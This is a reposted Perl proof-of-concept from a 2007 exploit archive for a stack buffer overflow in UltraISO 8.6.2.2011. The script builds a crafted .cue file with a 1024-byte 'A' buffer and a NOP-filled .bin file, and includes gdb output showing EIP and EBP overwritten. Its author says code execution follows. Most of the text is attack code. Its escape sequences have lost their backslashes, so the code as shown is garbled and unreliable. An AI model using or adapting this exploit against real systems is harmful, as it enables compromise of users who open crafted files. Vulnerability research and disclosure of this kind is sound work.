UltraISO <= 8.6.2.2011 (Cue/Bin Files) Local Stack Overfl

[Gonzalez]

Rated as : High Risk

#!/usr/bin/perl
############################################################
#Credit:To n00b for finding this bug and writing poc.
############################################################
#Ultra ISO stack over flow poc code.
#Ultra iso is exploitable via opening
#a specially crafted Cue file..There is 
#A limitation that the user must have the bin 
#file in the same dir as the cue file.
#This is the reason i have provided the 
#Bin file also Command execution is possible
#As we can control $ebp and $eip hoooooha.
#I will be working on the local exploit 
#as soon as i get a chance this should be a straight forward 
#to exploit this as we already gain control of the
#$eip register..
#Tested on :win xp service pack 2 
#Vendor's web site: [url]http://www.ezbsystems.com/ultraiso[/url]
# Version affected: UltraISO 8.6.2.2011
############################################################
#Debug info as follows.
#########################################
#Program received signal SIGSEGV, Segmentation fault.
#[Switching to thread 1696.0x6d0]
#0x41414141 in ?? ()
############################################################
#(gdb) i r
#eax            0x0      0
#ecx            0x7ce2fc 8184572
#edx            0x1      1
#ebx            0xfe6468 16671848
#esp            0x13ecf8 0x13ecf8
#ebp            0x41414141       0x41414141
#esi            0x0      0
#edi            0x13fa18 1309208
#eip            0x41414141       0x41414141
#eflags         0x10246  66118
#cs             0x1b     27
#ss             0x23     35
#ds             0x23     35
#es             0x23     35
#fs             0x3b     59
#gs             0x0      0
#fctrl          0xffff1273       -60813
#fstat          0xffff0000       -65536
#ftag           0xffffffff       -1
#fiseg          0x0      0
#fioff          0x0      0
#foseg          0xffff0000       -65536
#fooff          0x0      0
#---Type <return> to continue, or q <return> to quit---
#fop            0x0      0
#(gdb)
############################################################

print
"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~n";
print "0day Ultra-Iso 8.6.2.2011 stack over flow poc  n";
print "Credits to n00b for finding the bug and writing pocn";
print "I will be writing a local exploit for this in a few
daysn";
print "Shouts:  - Str0ke - Marsu  - SM - Aelphaeis - vade79 -
c0ntexn";
print
"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~n";

my $CUEFILE="1.cue"; # Do not edit this 

my $BINFILE="1.bin"; # Do not edit this 

my $header= "x46x49x4cx45x20x22";

my $endheader= "x2ex42x49x4ex22x20x42x49x4ex41x52x59x0dx0ax20".

"x54x52x41x43x4bx20x30x31x20x4dx4fx44x45x31x2fx32".

"x33x35x32x0dx0ax20x20x20x49x4ex44x45x58x20x30x31".
               "x20x30x30x3ax30x30x3ax30x30";

open(CUE, ">$CUEFILE") or die "ERROR:$CUEFILEn";

open(BIN, ">$BINFILE") or die "ERROR:$BINFILEn";

print CUE $header;

for ($i = 0; $i < 1024; $i++) { # Fill our buffer
$buffer.= "x41"; # For easy of debugging
}
print CUE $buffer;

for ($i = 0; $i < 100; $i++) { # Fill our buffer
$buffer2.= "x90"; # Fill our bin file with nops..Why not pmsl.
}
print BIN $buffer2;

print CUE $endheader;

close(CUE,BIN);

sleep(5);

print
"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~n";
print "Files have been created success-fullyn";
print "Please note you will have to have both 1.cue and 1.bin in the
same dirn";
print "To be able to reproduce the bug open the 1.cue file with
ultra~ison";
print
"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~n";
securitydot.net - 2007-05-24